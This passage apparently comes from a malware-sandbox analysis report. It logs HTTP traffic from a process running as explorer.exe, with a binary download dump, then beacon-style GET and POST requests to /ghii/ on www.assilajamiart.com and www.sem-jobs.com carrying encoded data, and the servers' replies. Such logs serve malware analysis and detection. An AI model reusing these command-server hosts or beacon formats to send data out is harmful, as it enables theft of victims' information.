ef 78 4d ef a7 97 c1 ef 00 c7 c0 1b fc 6f b6 f8 31 cc 19 7c 0c 03 a5 1d 05 be 52 60 2b 4d f9 e8 5c 3d b2 05 f4 64 60 0c 76 69 74 b0 ea c0 18 60 77 bd 41 bd 9b c6 20 60 bc 93 61 12 0f bc c1 c0 18 6c 77 8b 28 cc d6 2c 1d 78 2f dd 44 24 e9 8a c6 e1 df 91 2b 83 bd 31 d8 26 b0 3a 42 1a 7d eb 03 a3 06 6a df 7e 64 34 f5 d7 e2 83 31 c8 69 ba 62 39 62 11 9d ff 3e ce d3 e7 ff 48 c2 38 e7 9d fa 0b db 6c 23 9a 03 5f e4 ec 6c f2 e1 b7 d9 fd 4b 86 90 3f e6 2c dd 7c cc f2 34 8c 57 7b 20 e6 6f 3b 96 3e 9b 61 bc dd c1 10 a4 ec 6f bb 30 65 01 c1 55 d5 6c 32 d8 7f 30 06 61 fc 47 1a af 76 74 05 48 b9 a8 d8 1b e5 f0 fc 59 ed 6e 8f 31 aa b0 e7 c0 28 f4 18 c1 28 59 25 2a b3 fe e7 86 ae d8 9f 17 bf 30 1f b8 a5 a1 bb 07 79 37 7c 3a de 00 ec 9b 10 00 de f4 98 4e 8f 5b 53 48 c1 9b dd 36 4a 68 90 dd b8 b6 eb de 38 ee 8d 9f 26 db 2d 0b cc 91 b5 8d 61 86 8b 7a 7f ed 98 a0 47 40 44 49 3b f0 26 b6 6d 0c d6 2c 5c ad f3 81 e7 4c a7 c6 c0 a7 5b 3e e3 1a 93 7c 6f 0c b0 6f bd 26 b4 8e 25 fb fd 87 fd 37 37 7c 9d 80 6c 02 41 7b d3 10 a5 16 4a c6 37 6f be 29 24 fe bb 20 ce cc 6d ca 96 2c f7 d7 ef b8 d8 7f 77 73 d3 98 c3 28 c0 3b 9b 2d 93 38 cf ac 55 92 ac 22 46 b7 61 06 32 ba d6 72 40 a3 9c a5 31 2c 19
                                                                                            Data Ascii: 3aa8}`Mywdg*zND/E*$5@$(RI^8#n4F?|O&z?|O",67,_4cw,BM|@$Y _!?a|{Da,ldFl@)[yftuol$Bd8=dDQ7|a/0#Y3f$&;cIfLn1$jX~yL`,u%747yG#qebo,MHMonx7\ YyQlRXqUGHJ.=m6'v>$x@fffmJv=x2N|pxMo1|R`+M\=d`vit`wA `alw(,x/D$+1&:B}j~d41ib9b>H8l#_lK?,|4W{ o;>ao0eUl20aGvtHYn1((Y%*0y7|:N[SH6Jh8&-azG@DI;&m,\L[>|oo&%77|lA{J7o)$ m,ws(;-8U"Fa2r@1,
                                                                                            Feb 18, 2023 13:07:51.177150965 CET268INData Raw: 8d d0 4a b3 ec eb a7 4d 34 20 28 49 ef eb 7c 22 6f 53 fa b7 5d 72 47 7e 60 2c a8 6f 52 0d 9a 6f 96 8c 05 37 28 27 4b ca 2f 83 ff bb 64 b3 61 71 9e f5 24 c4 17 d5 55 8a e4 58 3d 86 71 90 3c 5a 1f 1f b7 6c 93 fc 12 fe c8 f2 3c 8c 57 19 b9 27 2f 83
                                                                                            Data Ascii: JM4 (I|"oS]rG~`,oRo7('K/daq$UX=q<Zl<W'/:1&A6Cl3lf>a0bge+=X=YK}ObHof.`7dXEfKO-rh(;]+, _bQ
                                                                                            Feb 18, 2023 13:07:51.177176952 CET269INData Raw: 66 61 c0 16 34 25 16 83 83 ac 24 87 58 c8 c5 e5 2e 8a c8 0b e7 bb 19 b1 65 ee 11 9f 46 fe 35 31 27 f6 c3 23 f9 9a 4c ec 2f 87 77 e2 7b 0a 07 9b 96 0a 4f dc da e4 11 c7 b6 1f 1e ef e4 08 e3 8f 7d 2f 52 1e c3 80 e9 48 31 c7 ce 41 4a 6a df 0b 42 76
                                                                                            Data Ascii: fa4%$X.eF51'#L/w{O}/RH1AJjBvqrIIJ#HFc1)zaz(?~62DrOPe0XY(baUrxSdlKS')|/f&(qAg &f-4M["
                                                                                            Feb 18, 2023 13:07:51.177201033 CET270INData Raw: 5a a9 58 f7 fc e0 83 d8 85 a2 0b 35 51 4f 06 6d 26 23 ef 49 f9 ab f2 a1 2c 16 8a 32 1f b0 98 3e 84 2b 0c 2a 91 e4 1c e6 07 68 ce 57 3e cd 31 e4 29 89 0d 2b 63 7e 12 07 34 7d 26 16 04 19 c1 9f 1f 1f 53 ba 85 20 28 1a 80 ac ed aa e1 3d 84 30 a5 82
                                                                                            Data Ascii: ZX5QOm&#I,2>+*hW>1)+c~4}&S (=0y$\clKd+QOUv2rT`rq*wk8A8pi8MY$"b[nF`An4ir'edkrmXpdF
                                                                                            Feb 18, 2023 13:07:51.177228928 CET272INData Raw: 49 fc 5e 44 be 02 57 a4 12 c5 19 cc 4d 63 b5 08 21 59 1d ab c8 fa c8 51 51 bd e0 15 aa e7 35 6d 51 72 a4 61 76 2b b6 0b 39 81 60 ca 37 4d a2 e4 6a 9b 86 1b 0a 41 b2 6d 15 0a ff 4e 81 0b 8f 25 b0 67 14 8d af da 2b 71 35 d4 83 1d 06 30 a0 a8 95 a1
                                                                                            Data Ascii: I^DWMc!YQQ5mQrav+9`7MjAmN%g+q50WR&RD7> L^LLD[:)0VjroMp|"y4aAGVK>9Ql&W,FW8'e(ZSCNJsl>'tB(~/U
                                                                                            Feb 18, 2023 13:07:51.177256107 CET273INData Raw: ab 1f 98 16 85 af 51 22 4b 45 56 1f 1e 84 56 6c 50 c5 4a 23 22 8a 92 f0 cb 3a c7 47 d0 b7 52 c5 d3 60 54 ae 45 10 93 17 ea 96 3c 99 4d e7 3c d3 0d 2c 86 8b d2 81 4e c4 06 21 dc b5 a8 d9 7a 09 df b4 2f cf 11 d8 0f 6b 64 88 d8 c2 33 ba 0c 31 b3 45
                                                                                            Data Ascii: Q"KEVVlPJ#":GR`TE<M<,N!z/kd31E<5L}Nz4!yJ3||IiQ9'($RZEdgQ(`-J5qH PO<2wqQVPe~O`cgT:2^`&.NX3E5
                                                                                            Feb 18, 2023 13:07:51.177283049 CET274INData Raw: 9c d7 c4 5c 19 2d 0c eb 11 3e be 8e b8 77 94 cf 98 2a 75 99 a4 1b cf a7 db 30 a7 51 f8 77 78 cd 47 e5 0a 07 a9 98 4b c1 7e 89 85 98 e8 42 f1 29 81 33 ac fc 59 dc cc e0 12 ba c8 9c de 0d 1c b0 23 02 1e ac 5b cb 61 d0 41 5d 69 b4 2d 68 ac 8a 15 d9
                                                                                            Data Ascii: \->w*u0QwxGK~B)3Y#[aA]i-h&_:JKI)bwMa`d>rtj$,V,Tjjw<zQWg`im}F2l2qI'RHWC5<r@GQ]al.(L\BzL}_
                                                                                            Feb 18, 2023 13:07:51.177309036 CET276INData Raw: 8f b3 3c f4 48 e0 eb 8d 9d 66 82 c1 0c 2b 3a c2 e7 1c e6 10 bc 04 11 75 be 0b 87 fd 19 ec 7f 85 c9 20 88 12 57 fb 75 d3 52 4e 09 7e 83 bf 3a 27 1c bc 4d 51 d9 8c 0b 6e 16 f7 52 f4 9f 05 62 fe 32 96 7a a6 95 00 0e 4d 9e 03 02 fd 15 78 24 dc fe ff
                                                                                            Data Ascii: <Hf+:u WuRN~:'MQnRb2zMx$Z''8pXXSM!KqlD3d<&k2oI)!]\rV!zM8y;Za4hX|&"*GSG*WAVPSz1qoV%@6sz>4,k>9cWwz
                                                                                            Feb 18, 2023 13:07:51.177341938 CET277INData Raw: 4a 16 06 6c 41 53 f1 52 41 56 a8 9b 3c e0 71 3c f8 a0 01 61 86 e0 c2 38 ce 7b 21 cc e8 9f 8b 90 03 87 8d cf 4d 89 86 81 75 45 fc f4 31 10 da b2 f0 79 95 d1 55 0e f8 21 95 9f 96 2d a3 98 5e 93 1c 42 1b 4e b8 f3 b9 4d 2c 31 69 ea 0f 64 c1 61 a9 ec
                                                                                            Data Ascii: JlASRAV<q<a8{!MuE1yU!-^BNM,1ida!]wR!N{%Kc`]!__3"h",:fq!A.Q zm;?$bffWq!"oq[ZRW5X\.M?2Jh3+W$x|2vhu*
                                                                                            Feb 18, 2023 13:07:51.177367926 CET278INData Raw: 77 f7 43 6c 38 84 ef 80 c8 31 1b 3a 85 8a b0 ba fd 97 ef 23 a0 29 27 7c 60 77 d2 ab 41 b8 3c e5 c1 1b 5c 23 44 83 28 df c1 d5 1d 24 59 84 11 ab 0d a1 9e f6 4a d7 89 25 08 05 88 47 73 51 d3 fa 74 9e 34 29 39 06 56 85 14 f2 22 38 66 6b 45 83 22 39
                                                                                            Data Ascii: wCl81:#)'|`wA<\#D($YJ%GsQt4)9V"8fkE"94"QG `3MU,(8cl0A@,(aoydb?h1P`GkM9]L7K-;||ta,^+&eh?y_UWWlHu=
                                                                                            Feb 18, 2023 13:07:51.196116924 CET280INData Raw: ff 98 e2 08 e1 ba 80 07 26 97 ca 44 57 0b b8 ef 01 4a f4 77 07 15 18 3d 2e a5 c3 5c a8 d3 5b 3f 56 1c 3e c8 4a 3e d5 3d 1f ad 50 cf da 92 ba a0 7a 69 92 e4 2f a6 c9 aa 57 f6 68 96 f3 2b 7c e8 58 b1 bd ab 80 2d a6 d3 f9 5d 47 45 c7 bb f2 19 1d 4d
                                                                                            Data Ascii: &DWJw=.\[?V>J>=Pzi/Wh+|X-]GEMw.u]Gl9gs, NvUzWcwuzVZ`p~nR:$e;,H$#iL?uy`Ztfln,-74o}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            21192.168.2.349721141.95.126.8980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:53.559796095 CET292OUTGET /ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH6QHxBezwh0VT5YfLMIY+0KdzPIu3ty6XebiauUbAvcGQ== HTTP/1.1
                                                                                            Host: www.assilajamiart.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:07:53.677145004 CET292INHTTP/1.1 301 Moved Permanently
                                                                                            Connection: close
                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            x-redirect-by: WordPress
                                                                                            location: http://assilajamiart.com/ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH6QHxBezwh0VT5YfLMIY+0KdzPIu3ty6XebiauUbAvcGQ==
                                                                                            content-length: 0
                                                                                            date: Sat, 18 Feb 2023 12:07:53 GMT
                                                                                            server: LiteSpeed
                                                                                            vary: User-Agent


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            22192.168.2.34972285.13.156.17780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:06.443666935 CET294OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.sem-jobs.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.sem-jobs.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.sem-jobs.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 68 35 43 34 30 42 6a 54 74 55 55 4d 66 37 75 6e 5a 4e 69 33 37 76 34 6d 73 6b 28 62 66 38 42 59 48 47 45 72 5a 6c 34 48 68 55 49 62 66 4c 79 35 49 4f 41 66 78 53 6c 46 36 4e 4e 42 31 67 32 47 43 42 6f 76 33 32 74 51 66 4d 6e 5f 28 42 46 6c 62 57 6e 6b 68 64 79 63 33 45 51 42 32 2d 6f 4b 36 30 74 6a 45 43 6b 46 48 31 49 37 78 61 77 34 59 66 4f 41 62 67 73 75 31 75 7e 73 43 44 61 47 69 38 68 38 71 61 36 32 4d 53 70 4a 34 58 59 67 28 35 54 52 38 38 44 53 4b 47 71 44 6f 52 6b 75 55 62 48 62 7a 7a 41 4e 43 66 68 33 34 51 7e 44 28 67 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=h5C40BjTtUUMf7unZNi37v4msk(bf8BYHGErZl4HhUIbfLy5IOAfxSlF6NNB1g2GCBov32tQfMn_(BFlbWnkhdyc3EQB2-oK60tjECkFH1I7xaw4YfOAbgsu1u~sCDaGi8h8qa62MSpJ4XYg(5TR88DSKGqDoRkuUbHbzzANCfh34Q~D(g).
                                                                                            Feb 18, 2023 13:08:06.471977949 CET294INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:08:06 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 196
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            23192.168.2.34972385.13.156.17780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:08.976542950 CET300OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.sem-jobs.com
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.sem-jobs.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.sem-jobs.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 68 35 43 34 30 42 6a 54 74 55 55 4d 65 62 79 6e 66 75 36 33 38 50 34 68 78 55 28 62 45 73 42 63 48 47 49 72 5a 67 59 58 6d 6d 6b 62 65 63 32 35 49 73 6f 66 7a 53 6c 46 38 4e 4e 46 37 41 33 66 43 41 4d 6a 33 30 31 41 66 4f 4c 5f 7e 58 42 6c 59 32 6e 6e 39 4e 79 64 30 45 51 43 72 75 6f 4b 36 30 68 4a 45 44 6c 34 48 78 4d 37 77 76 38 34 59 64 6d 44 61 77 73 76 34 4f 7e 73 43 44 57 5a 69 38 67 44 71 61 79 6d 4d 53 4a 4a 36 46 77 67 36 73 76 4f 31 4d 44 72 48 6d 72 30 6e 6c 39 6b 66 37 44 58 33 67 46 79 54 70 51 4c 36 55 36 4f 38 58 47 44 36 70 4e 56 74 70 61 4b 31 65 78 37 65 59 79 57 49 5a 77 6f 42 51 74 63 52 51 75 71 41 48 4e 79 73 79 4a 41 36 6e 4a 4b 31 72 69 42 46 44 6b 36 4e 34 32 74 6d 61 34 64 6e 53 59 74 38 68 67 43 36 4d 39 34 36 78 51 69 49 4c 4f 54 53 78 4b 71 66 38 76 4e 31 4e 65 32 65 49 35 32 66 70 4e 72 64 45 64 4c 58 36 52 31 76 51 32 52 7e 58 4c 4c 74 4b 28 47 4f 57 31 47 46 51 30 4d 68 71 51 5a 34 67 77 33 65 71 77 44 6a 55 7e 6b 69 76 38 33 62 53 75 58 59 4d 7e 59 50 55 58 66 6b 71 4b 78 64 33 36 64 65 46 7a 5a 4e 66 39 6f 65 6a 69 73 45 58 58 6e 6e 78 71 47 76 41 37 53 66 56 68 56 39 63 79 71 52 48 73 34 69 4a 74 32 56 6b 4e 73 56 76 39 66 77 6d 62 61 6c 67 4e 4d 59 73 53 61 31 57 59 46 36 6d 75 4c 7a 46 52 74 54 77 63 37 73 35 4f 4d 74 68 48 74 43 33 46 33 61 35 52 61 69 70 77 2d 67 34 41 6a 75 33 4b 71 74 76 4f 52 4b 56 39 44 35 6f 39 65 4f 62 57 43 63 72 68 75 33 6e 4c 2d 73 33 59 31 6d 67 6d 66 41 72 43 38 34 75 73 52 4e 74 45 7a 49 65 42 56 4c 54 68 62 67 38 69 41 6b 46 70 64 37 5a 4a 58 66 67 59 76 64 4b 79 63 4d 6f 32 70 28 44 37 32 62 79 65 66 50 64 69 37 48 46 62 57 31 71 43 55 59 6a 65 37 6b 64 6d 34 44 38 4c 57 6b 58 6b 33 50 61 53 56 55 37 35 75 59 39 6a 4d 4c 44 58 6f 4f 64 6e 30 43 44 34 4f 6d 6d 51 75 76 52 6d 52 6b 35 68 71 6f 61 75 32 44 70 4c 54 67 34 67 32 5a 69 69 78 78 49 61 41 4d 49 75 7a 73 53 4e 53 43 32 79 41 79 70 55 34 56 42 48 6b 70 76 73 74 34 47 75 4f 68 6b 76 30 6e 4a 67 66 71 66 69 55 30 37 79 6e 63 4a 5a 65 30 76 51 53 45 44 31 31 68 2d 6d 45 30 64 34 54 6f 54 4e 4f 52 51 36 47 49 72 4c 70 31 57 52 2d 63 39 6f 71 41 64 73 31 50 38 6a 51 33 51 6e 50 4e 72 6f 35 41 7a 61 75 79 4f 51 66 4b 4b 69 65 32 36 79 65 4c 65 45 6d 7a 30 35 56 76 69 66 6c 69 75 54 35 76 2d 71 41 39 56 43 4a 69 50 45 36 54 75 56 4b 4c 66 36 62 79 66 34 44 4a 70 6f 63 61 64 55 53 34 70 33 5f 66 6e 28 4f 72 72 5a 36 4f 4f 39 62 55 75 4b 71 50 66 69 76 50 6e 45 44 35 68 6b 68 6a 76 61 79 55 33 38 68 42 65 37 62 45 57 42 69 72 54 78 6c 63 2d 66 2d 4a 50 59 64 72 58 6b 78 36 44 51 5f 44 72 38 70 4a 5a 38 39 47 77 39 54 5a 51 50 47 72 5a 7e 47 57 77 6a 72 57 7a 4e 4b 4e 79 4f 62 39 51 71 30 62 56 38 45 4c 53 43 54 56 58 43 46 52 44 77 37 76 35 38 52 37 63 43 2d 4d 59 6f 77 72 61 78 6f 35 5a 46 76 41 6c 28 54 65 75 79 57 52 56 4c 46 56 70 43 54 53 4b 49 4a 61 6a 4d 34 44 6b 4a 47 5a 72 73 6c 66 52 78 59 4d 42 33 4f 33 6f 36 52 78 32 54 47 7e 63 39 57 42 76 70 7a 74 45 50 55 66 67 4f 52 67 35 37 56 76 73 37 43 74 6a 33 30 32 64 70 4e 55 49 4a 73 6a 62 76 59 51 35 35 46 6d 45 33 4c 49 75 79 45 47 7a 63 59 4e 53 54 30 68 4b 30 46 67 6b 6d 61 55 33 48 6c 7e 69 55 33 6d 47 4a 63 63 31 6d 48 30 45 44 6a 34 70 65 6c 34 78 78 4b 4f 6e 57 74 57 34 32 78 32 53 43 6f 4a 50 34 32 67 7a 47 4c 62 50 79 79 32 7a 6b 5f 7e 76 4e 35 48 52 35 32 78 42 69 6a 5a 51 6f 42 4f 64 77 59 31 63 6a 6a 6c 51 28 44 6f 72 5a 67 4f 50 47 45 6e 75 76 5f 46 30 31 31 4d 42 63 78 38 6e 4b 63 53 65 67 4b 71 63 52 67 6e 6a 6b 37 64 30 4f 57 61 66 6b 35 32 34 4b 6f 7e 72 32 71 4d 64 56 4b 41 55 53 63 49 75 61 51 45 37 49 55 77 35 62 6e 44 59 7e 43 4e 4b 33 54 6a 41 48 35 65 7a 70 4e 39 78 4d 39 4f 62 7e 6b 34 65 57 67 59 32 28 4a 54 53 36 62 4f 77 4f 65 61 64 6f 50 32 64 47 4d 70 51 37 4b 55 59 62 65 30 36 6d 45 34 69 49 68 58 5a 53 49 59 75 4d 75 57 4b 62 55 7e 39 43 50 41 6e 33 6e 4b 7a 35 66 35 7a 39 45 73 53 6b 2d 6f 34 34 4b 76 57 4a 54 34 64 76 43 70 47 50 47 53 45 58 4b 7e 2d 4f 65 55 46 34 58 72 76 37 75 43 56 59 39 72 35 31 42 66 63 4a 49 77 4a 50 48 59 7a 4f 46 62 34 6d 69 47 69 31 6f 77 7a 7e 59 71 6b 66 55 68 50 71 55
                                                                                            Data Ascii: Y5=h5C40BjTtUUMebynfu638P4hxU(bEsBcHGIrZgYXmmkbec25IsofzSlF8NNF7A3fCAMj301AfOL_~XBlY2nn9Nyd0EQCruoK60hJEDl4HxM7wv84YdmDawsv4O~sCDWZi8gDqaymMSJJ6Fwg6svO1MDrHmr0nl9kf7DX3gFyTpQL6U6O8XGD6pNVtpaK1ex7eYyWIZwoBQtcRQuqAHNysyJA6nJK1riBFDk6N42tma4dnSYt8hgC6M946xQiILOTSxKqf8vN1Ne2eI52fpNrdEdLX6R1vQ2R~XLLtK(GOW1GFQ0MhqQZ4gw3eqwDjU~kiv83bSuXYM~YPUXfkqKxd36deFzZNf9oejisEXXnnxqGvA7SfVhV9cyqRHs4iJt2VkNsVv9fwmbalgNMYsSa1WYF6muLzFRtTwc7s5OMthHtC3F3a5Raipw-g4Aju3KqtvORKV9D5o9eObWCcrhu3nL-s3Y1mgmfArC84usRNtEzIeBVLThbg8iAkFpd7ZJXfgYvdKycMo2p(D72byefPdi7HFbW1qCUYje7kdm4D8LWkXk3PaSVU75uY9jMLDXoOdn0CD4OmmQuvRmRk5hqoau2DpLTg4g2ZiixxIaAMIuzsSNSC2yAypU4VBHkpvst4GuOhkv0nJgfqfiU07yncJZe0vQSED11h-mE0d4ToTNORQ6GIrLp1WR-c9oqAds1P8jQ3QnPNro5AzauyOQfKKie26yeLeEmz05VvifliuT5v-qA9VCJiPE6TuVKLf6byf4DJpocadUS4p3_fn(OrrZ6OO9bUuKqPfivPnED5hkhjvayU38hBe7bEWBirTxlc-f-JPYdrXkx6DQ_Dr8pJZ89Gw9TZQPGrZ~GWwjrWzNKNyOb9Qq0bV8ELSCTVXCFRDw7v58R7cC-MYowraxo5ZFvAl(TeuyWRVLFVpCTSKIJajM4DkJGZrslfRxYMB3O3o6Rx2TG~c9WBvpztEPUfgORg57Vvs7Ctj302dpNUIJsjbvYQ55FmE3LIuyEGzcYNST0hK0FgkmaU3Hl~iU3mGJcc1mH0EDj4pel4xxKOnWtW42x2SCoJP42gzGLbPyy2zk_~vN5HR52xBijZQoBOdwY1cjjlQ(DorZgOPGEnuv_F011MBcx8nKcSegKqcRgnjk7d0OWafk524Ko~r2qMdVKAUScIuaQE7IUw5bnDY~CNK3TjAH5ezpN9xM9Ob~k4eWgY2(JTS6bOwOeadoP2dGMpQ7KUYbe06mE4iIhXZSIYuMuWKbU~9CPAn3nKz5f5z9EsSk-o44KvWJT4dvCpGPGSEXK~-OeUF4Xrv7uCVY9r51BfcJIwJPHYzOFb4miGi1owz~YqkfUhPqUd6UVREFXymfi(upmrHLQuxaq018USnkynBNCzjQZ0uh2AgnUcGwPgwl6Qx7G4tPvcwq1ru7nY_YKtbuNC6dc5DUQL_Ekitod8pddTKbCo4ThrIMcWkFKertojCvIdPrytWn-zyA_8FvLPPD2gJIp3ZLGbDXLYSelIU360_VCrwd4EX0KyFGJWX~XNH9zN7KZhci-l481QzONsYfWwQv-cb1Huec9L8icl8KxM6ZFwCXpchvW2tBOUtW_eypkJQ~2NhurmrtxfzJPu_lIlP0dRTzvMdEPLQhsQMLFjkp2WnvslRaj(_Ez2jFEtM6AddH9fUQjZQ(tWdgaksPK5GXjV-2WtCsshdt50trivleWa_GJ8l5HUZiCtuCqkgg9vqqCsJoRwzxnb_X9w1gvyi0VEmhOeuiZE5RB78(v48fyRa(fu21286KIcWsjh8IIhYldNiTKuHYbESxYP6XtWAVODFGAFSvxWDijvHi1pCtv~zUNmHNtc5CXrJx7v7ERHbUC(Pf8K6R_RI2CNCzN6bMa9PF6t_9J0SPtqE17A79r1J7rwTlSDg0f(xpP2FJqV_Vk3OiBXcGs0shpj0GONeEHsDjoQVlfuaJ-PydCE0EWbPkTiwyxJpol9goduXUUrDtfK7IuPGkzr9Pbm5~8NYCK6jR7ZebaMJ17Ma7tdxRhfKFc6P30OZF6iIjjRdA05ktk4TjR4Nh1JAm8bnZqbajm55RPdvaEtjhuk58jePnrwTBn83rjduSqagDmqFdCMeC2KDdA(Kz2IOPiKYMESfvFZu48mwYeE-bE1kLEwOO86uH-EHZupBo_cJr_k7arzU2fRsYOJxPgWGTMsERmtC4Wkwft2iS75G1U5IsZusg1NsS-(AmBtpgKWIVibVfqvCB-x7jcnH60cDiKZFpbXCrww3yG6fSwZgMtjaafle4iZNU_UOppwWIfja6hAtVwlBjqy9gFUyVvJQyp0tp-vhcxyZgDwG2avj9OW7dqY2inUVv7fBNIxGgUSowVk5WE5DXkqkUXEoQjWXoz0sWkWZjBwoKppC~NT1LsmX0sqjoLAQkIG9oWs7E-9q9y(amUVPBbTc5GuVTSoNIizFA2qU0ocxBkrZZQ0lHFO2jqO1luZd4gHDlk0LluU5VwZZtM(ScXo_PDBRlP50N-64tn2uApvb0JT-yvz8owia0yw7oq9fTFPGbzLUo22EpoT6U6wiAcXzxBQ-zd6mc8kijs2wnh6aP_0X0jcvUEI540JiEWHdyrRgE8Epb819QhEiJ37m8-wuV-QyLuy5RcAFGtsPB5g22WwfDoo5WLqTtQnj6s2dxgIPBf5F9AYj~CBDvz7IAPvTpz0mUhBreicEdv35eLWiKOk75cPs9WRgFn(g4xqwZFYqxpQqiJ23x3IAQSWUCgcpdrci(WX34ReA1MnBdubPcVsVGZPfWLPKwUHkW63BwP8f0tldhkJrjRARCo~bauSDYgzWWNFjOWgEIPx5NvymrC(-WsiRK4NTtNHI40H4LThIVIWiqHE5NajFxKEuV4~_q-PJeXb8q0ljvcsd33O3sxC6j_rWYt1DYHwNQJdMpMcinAeo~TvALQS4oTWpG_(CKr5w8xjCoy6u(tpmrCXcEWcHE6wzT6hou2OqyHfvcNblzh8JgNsUUpIIfz3MhxR63XwjfWwN6W~Yo1mOfG6_zDpCxJNx39yt(EikQip8L3SHmo4cElZgKOt2FzOKOJl_VW7LPAIy3n9rMhzOAYPxx0t2USyW4BFGxVK_3vxB(acZ929kI6IPciuEBdDAqPw9hJ3lZfW3w3K5M5MCRQw_pWYYA57KObPgTeyhMjiD3yTd3C74f7gc(_DFrtVm(WxIUYTT6X91X0sjhPPc5eiJaERMsHvJzqQ8C7ACROw7d3vfFPLC~0R6kXJBEXCzTdwZ9iLqLA4WR_s92TkhqhwgVNOPRvnQ2tF2JYuSyZkgk_z2r9Jc0dnqDSlfn1aXeIHzpjKyYUsSaJvicrualLE0vwaqzQFb8GlvQ9TI1zXdhXUKSDt2bSOyMLvWmPA8MGRVy4nduZ0vtHNE1yEbbZJClm5H30Ao(EtBMf9yf-AtAGtSn6mbJ9lBjQB7XDa1Yjm7xjlifB2SV3OpshTjj7n70-dPJfcNZmqqfgHWSTmrtO8miGs7WBGGnfwJM3Um77n-V7yvkZpt31giLyEAoeJAnlrhXIEvxktGrk1NRem6uGo_lKshR9R5f_KXKfwhnuYXRqSzNQ1bCxEVaYGqwZ~0IUDxMPIKVplQtPM25r2z0tPDWqOgFp4GhdkNFDLFPi4sX-Htf6KuR4711DUermSr8C5Bzww8vI1STGpTWq7lLvCkr_IB0eUQHQG8Th0-eu7nuSWydGJYAZJGW3SSibYDfY52umLjAWUYYKSvwEqDl-t0mz3nx4D8DB5gIIVvQKoAik4rXzn9DLc7HfIuIQUz6zJLkvHg5O4fmAAUSiC_tqLKrqiE3Y2IFEn93_WY2TmpBVMnpmxmaJk1Pge8yhvq~zd9q_Cjgdmnp_EMjx11v0HyRWCiVe6aQixIuMTxT-ytm2qWFcIAdEd9UMwIL4zuCMx1R2zvJDVG6X(39IJdgVbluAwh7Mh9x4xnySUbSaf6KqgDUY5kSrPpzF2PLCk0ZZ(Kb0bqbSu8GtdhVRLoHNzNJ0CPIdemLZ4ixfP9p1Iwj6qYLfNO0Wtobm784uCuvpr21HMrSQ3qS
                                                                                            Feb 18, 2023 13:08:09.005995035 CET301INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:08:08 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 196
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=iso-8859-1
